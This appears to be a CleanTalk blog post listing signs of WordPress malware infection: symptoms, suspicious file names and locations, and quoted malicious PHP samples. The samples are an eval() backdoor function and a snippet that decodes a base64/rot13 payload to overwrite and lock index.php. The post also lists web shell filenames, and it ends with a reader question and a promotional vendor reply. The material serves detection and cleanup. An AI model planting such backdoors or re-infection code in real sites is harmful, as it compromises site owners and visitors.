Hi guys,
I’d like to share some significant signals that tell about infection on a WordPress site. These data has been collected by our research team at CleanTalk. The team reviews up to 10k files weekly as well as we have over 1,600 signatures of malicious files.
How do I understand that my website is infected?
Before we look at malware signs, let’s dive into typical symptoms which show a WordPress site has been infected,
- Any HTTP redirects to third-party sites that automatically run on a website.
- Site responses much slower than it was.
- Hosting provider notifies about unusual utilization of servers resources like CPU or inbound/outbound traffic.
- Huge amount of outgoing email messages from server that hosts your web site.
- Broken design (HTML layout) of a website.
Signs of Malware files and Malicious code
Okay, here you are the signs of malware on a site,
1. Files down below are not located in the WordPress root (WP_ROOT),
wp-login.php
xmlrpc.php
admin-ajax.php
options.php
admin.php2. File with name KGks.js.php is 100% malicious.
3. Files with name pattern and location WP_ROOT/wp-XXXXXXX.php (for example: WP_ROOT/wp-canvas.php, WP_ROOT/wp-controller.php), that includes code,
function getid3_lib($canonicalizedHeaders)
{ // Browser compatibility.
eval($canonicalizedHeaders);
} // Remove the JSON file.4. Any files without an extension and digits in the name. For example: 84639, 5718129 and etc.
5. Files with content like this,
<?php
$ddscdws = "index.php";
$acdfadfasf = file_get_contents($ddscdws); $sdfdsdfh = "/home3/.../public_html/starmap/wp-content/plugins/astra-widgets/admin/bsf-analytics/assets/css/93917";
if (file_exists($sdfdsdfh)) { $iide = file_get_contents($sdfdsdfh); $iide = base64_decode(str_rot13($iide)); if(md5($acdfadfasf) != md5($iide)) { @chmod($ddscdws, 0644);
@file_put_contents($ddscdws, $iide);
@chmod($ddscdws, 0444); } }6. Files with name from the list below most likely are malware,
radio.php,
ajax.php,
wso.php,
cmd.php,
shell.php,
reverse_shell.php,
profile.php,
xmlrpc.php,
css.php,
category.php,
image.php,
admin.php,
impositive.php,
esp.php,
shellron.php.Here is detailed case how is radio.php infects WordPress.
7. Any *.php files that are located inside WP_ROOT/wp-content/uploads/.
8. Any suspicious code inside files,
WP_ROOT/index.php
WP_ROOT/wp-settings.php
WP_ROOT/wp-config.php9. Files with suspicious names like 1gkj2saf.php, 862349.php, Ads8DU2.php and etc.
10. Hidden files with extensions .otc, .ott, .css are close to 100% are malicious. For example: .gk23sa.css, .1942t53.ott, .2634gkgre.otc and etc.
As you can see, attackers use server side executable files to run malware that is why you have to look after suspicious .php files on your WordPress site. As a bonus, here you are screenshots from our backend of a few good examples of malware files.
Please let me know your thoughts in the comment section down below.
Update on October 23, 2024
System cron is another way to infect WordPress, find details here https://research.cleantalk.org/cron-as-the-way-to-re-infect-wordpress/
The Real Person!
The Real Person!
Hello. Files with bizarre names that are size 0 bytes… I have a ton of them in many web sites that were hosted for several years at InterServer.
I’ve moved out and trying to clean them up. Do you know the name of a malware that generates up to thousands of odd-named files size “0”?
Thank you.
Hello, Kathleen Pageot.
Thank you for reaching out. The presence of numerous bizarrely named files with a size of 0 bytes is indeed a common issue caused by certain types of malware that have become quite popular recently. This malware can create these empty files as part of its activity, potentially compromising your website’s integrity and performance.
To help you effectively combat this issue, we highly recommend downloading our specialized malware detection plugin – Security by CleanTalk (https://wordpress.org/plugins/security-malware-firewall/). It is designed to identify and eliminate various forms of malware, including the one you’re experiencing, and it’s user-friendly, making it easy to use for anyone.
Additionally, if you’re looking for a more thorough solution, we offer a deep, manual malware removal service for your site (https://l.cleantalk.org/website-malware-removal). Our experienced team will meticulously inspect your website, remove any malicious files, and ensure that your site is secure moving forward. As a special gift, when you contact us for manual removal of malware, we’ll provide you with a one-year license for our security plugin at no extra cost!
We’re confident that either our plugin or our cleaning service will effectively help you remove these unwanted files and safeguard your site against future threats. Should you have any questions or need further assistance, please feel free to reach out. Our team is here to support you!
Best regards